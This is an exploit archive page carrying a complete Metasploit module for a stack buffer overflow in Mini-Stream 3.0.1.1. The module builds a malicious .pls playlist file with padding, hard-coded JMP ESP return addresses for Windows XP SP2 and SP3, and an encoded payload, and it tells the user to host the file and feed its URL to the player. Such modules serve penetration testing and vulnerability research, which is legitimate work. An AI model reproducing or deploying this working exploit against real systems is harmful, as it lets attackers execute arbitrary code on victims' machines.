Mini-Stream 3.0.1.1 Buffer Overflow Exploit

Mini-Stream 3.0.1.1 Buffer Overflow Exploit: Posted Dec 31, 2009; Authored by Ron Henry, Corlan Security Team, dijital1 | Site metasploit.com; This Metasploit module exploits a stack overflow in Mini-Stream 3.0.1.1 By creating a specially crafted pls file, an an attacker may be able to execute arbitrary code.; tags | exploit, overflow, arbitrary; SHA-256 | 4192232f4608503f3384466b334e0ca938b1481a1a306823bf6f3b3b10595f7d; Download | Favorite | View

Mini-Stream 3.0.1.1 Buffer Overflow Exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',
      'Description' => %q{
        This module exploits a stack overflow in Mini-Stream 3.0.1.1
      By creating a specially crafted pls file, an an attacker may be able
      to execute arbitrary code.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Corlan Security Team ',
          'Ron Henry <rlh[at] ciphermonk.net>', # Return address update
          'dijital1',
        ],
      'Version' => '$Revision: 8038 $',
      'References' =>
        [
          [ 'OSVDB', '61341' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/10745' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload' =>
        {
          'Space' => 3500,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows XP SP3 - English', { 'Ret' => 0x7e429353} ],     # 0x7e429353 JMP ESP - USER32.dll
          [ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ],     # 0x7c941eed JMP ESP - SHELL32.dll
        ],
      'Privileged' => false,
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.pls']),
      ], self.class)
  end


  def exploit
    sploit = rand_text_alphanumeric(17403)
    sploit << [target.ret].pack('V')
    sploit << "CAFE" * 8
    sploit << payload.encoded

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
    print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application")
  end

end

Top Authors In Last 30 Days

Red Hat 253 files
Ubuntu 83 files
Gentoo 29 files
indoushka 26 files
Debian 10 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
Google Security Research 2 files
S. Dietz 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,527)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,402)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,689)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

Mini-Stream 3.0.1.1 Buffer Overflow Exploit

Mini-Stream 3.0.1.1 Buffer Overflow Exploit

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Mini-Stream 3.0.1.1 Buffer Overflow Exploit

Share This

Mini-Stream 3.0.1.1 Buffer Overflow Exploit

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems